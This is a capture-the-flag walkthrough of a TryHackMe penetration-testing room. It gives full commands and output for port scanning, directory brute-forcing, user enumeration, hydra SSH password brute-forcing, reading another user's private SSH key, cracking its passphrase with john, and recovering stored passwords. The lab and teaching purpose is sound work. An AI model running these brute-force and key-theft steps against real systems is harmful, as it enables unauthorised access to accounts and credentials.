https://github.com/arget13/simplyLamport
Photo by Arget / Unsplash

After my success in a previous try hack me room, I decided to have a go at another one.  This time it was a bit more difficult, and I have to admit, I needed to check the video at some stages to get some guidance.  Never the less, here is how I managed to complete the room.

Learning Objectives

The room was designed to give the user experience with the following tools and techniques:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

I didn't have much experience with hash cracking or brute forcing, so this was a good room for me to learn a bit about that.  I was familiar with the name of one of the tools I ended up using but hadn't used it in over a decade.

Questions

The list of challenges/questions for this room were as follows:

  1. Find the services exposed by the vulnerable machine
  2. What is the name of the hidden directory on the web server?
  3. Use brute-forcing to find the username and password
  4. What is the username?
  5. What is the password?
  6. What service do you use to access the server?
  7. Enumerate the machine to find any vectors for privilege escalation
  8. What is the name of the other user you found?
  9. If you have found another user, what can you do with this information?
  10. What is the final password you obtain?

Find the Services

The first thing I did was open up nmap and do a port scan on the server, asking it to retrieve the services and their versions, if possible.

──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ nmap -sV 10.10.112.215
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 01:08 CET
Nmap scan report for 10.10.112.215
Host is up (0.042s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then I went to the website hosted on port 80 and was greeted with the following under construction page.

Nothing much to see here unfortunately

Although there was nothing to see here, because of the question I knew there was a hidden directory hosted on this server, so it was time to use dirbuster to scan for any hidden directories.

Find the Hidden Directory

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ dirb http://10.10.112.215

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 20 01:12:05 2020
URL_BASE: http://10.10.112.215/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.112.215/ ----
==> DIRECTORY: http://10.10.112.215/development/                                                                                                                              
+ http://10.10.112.215/index.html (CODE:200|SIZE:158)                                                                                                                         
+ http://10.10.112.215/server-status (CODE:403|SIZE:301)                                                                                                          ---- Entering directory: http://10.10.112.215/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Dec 20 01:15:13 2020
DOWNLOADED: 4612 - FOUND: 2

Scanning the directory with dirbuster I was able to determine that the name of the hidden directory was in fact: development.

In this directory, there were 2 text files.

I wonder if there's anything interesting in here...

The contents of these files was as follows:

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K

This lead me off on a bit of a tangent, searching for vulnerabilities for Struts version 2.5.12 and the tomcat server which was running on port 8080.  This ultimately ended up fruitless.

Finding the Usernames

Earlier on in one of the AdventOfCyber2 challenges, I was introduced to a script which could enumerate a Linux server and return a wealth of information about it.  I decided to try and run that script against the server instead.  This script is called enum4linux and comes preinstalled with Kali-Linux.

The results of running this against the server revealed a lot of information, but perhaps the most important was the usernames of the J and K users.  A snippet from this script showed me the following:

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ enum4linux -a 10.10.81.129
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
...

So now I have the answers for questions 3,4,5 and 8.  But how to get the password for the user, and which user to try and crack?  Well, from the message that Kay so kindly left for Jan in the hidden development folder, we know that Jan has a weak password that should be easy to crack, so I decided to try that next.

Cracking the Password

From the port scan earlier I know that an SSH server is running on port 22, so I try and brute-force the ssh login.  I used a tool called hydra to do this.  I gave hydra the known username, "jan", and a list of passwords. Hydra will try all the passwords in the list and show me whenever there's a successful match.

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.81.129 ssh -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-20 23:13:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.81.129:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
STATUS] 130.67 tries/min, 392 tries in 00:03h, 14344009 to do in 1829:36h, 16 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[22][ssh] host: 10.10.81.129   login: jan   password: armando
[STATUS] attack finished for 10.10.81.129 (valid pair found)

So the answer to question 5, the password, is armando.

Login with SSH

Perfect, now I have the password for the Jan user.  I can use this to login via ssh.

┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ ssh jan@10.10.81.129
jan@10.10.81.129's password: 
Last login: Sun Dec 20 17:33:33 2020 from 10.8.145.210
jan@basic2:~$

Enumerating the Linux Server

So now that I have SSH access to the server, it's time to run an enumeration script locally on the machine, to see if there are any avenues I can exploit.  I used a script called LinPeas.sh that I found on GitHub.  LinPeas gives a lovely colourful output of the various things it has found, with colour coding for severity, so it is easy to know what to try and exploit first.

┌──(gareth㉿SRF239-L)-[~/Desktop/Tools]
└─$ scp linpeas.sh jan@10.10.81.129:/tmp/linpeas.sh
jan@10.10.81.129's password: 
linpeas.sh

jan@basic2:~$ cd /tmp
jan@basic2:/tmp$ ls
hsperfdata_tomcat9
linpeas.sh
systemd-private-57d6d8ce909b4ab5881fd8dfb036a4b1-systemd-timesyncd.service-9s6Nq1
jan@basic2:/tmp$ chmod +x linpeas.sh 
jan@basic2:/tmp$ ./linpeas.sh

This script produced a lot of output.  The most interesting however was the availability of an ssh file for the other user on the system (kay).

[+] Searching ssl/ssh files
/home/kay/.ssh/authorized_keys                                                                                                                                                                                                             
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa

Let's see if I can access this file, and if so, if I can use it to login as the Kay user.

jan@basic2:/tmp$ cat /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX
AkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN
lG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU
.....
e5ofsDLuIOhCVzsw/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----
Wow, it was readable!

Remarkably the file was readable by the Jan user, so I now have the private key.  I copied it to my local machine (using scp) and tried to login as kay.

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ ssh -i kay_id_rsa kay@10.10.81.129
Enter passphrase for key 'kay_id_rsa':
Nope, it's password protected

Cracking the SSH Key Password

So it looks like I need to try and crack this ssh file's password.  I can use a tool called John to try and do this.  To be able to use John though, I need to convert this ssh file into a format it understands.  Thankfully there's a script that comes with Kali-Linux called ssh2john.py which will do just that.

Once I have the file in the format John understands, it's time to crack the password.  For this cracking attempt, as with the previous one we'll be using a very large and famous wordlist called rockyou.txt.

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa_john

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa_john 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:07 DONE (2020-12-20 23:56) 0.1336g/s 1917Kp/s 1917Kc/s 1917KC/sa6_123..*7¡Vamos!
Session completed

It worked!!  I can now use the found password beeswax to add the ssh key and login to the server as kay.

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ ssh -i kay_id_rsa kay@10.10.81.129
Enter passphrase for key 'kay_id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

Now it's time to find the password to answer the final question for the room.

Luckily in the home directory I found a file called pass.bak.  This file contains the final password:

kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$

Review

This room was a lot more difficult than the previous one.  There were several different tools involved and a few different potential avenues to explore.  

It taught me the importance of running enumeration scripts early to see if they can help solve problems automatically, without wasting time trying to find out things for myself in a more manual way.

It also opened up my eyes to how easy it is to run brute-force attacks against systems, and how to crack files offline as well.

I really enjoyed this room and hope I can find another similar one to try without having to resort to peeking at the video to make progress.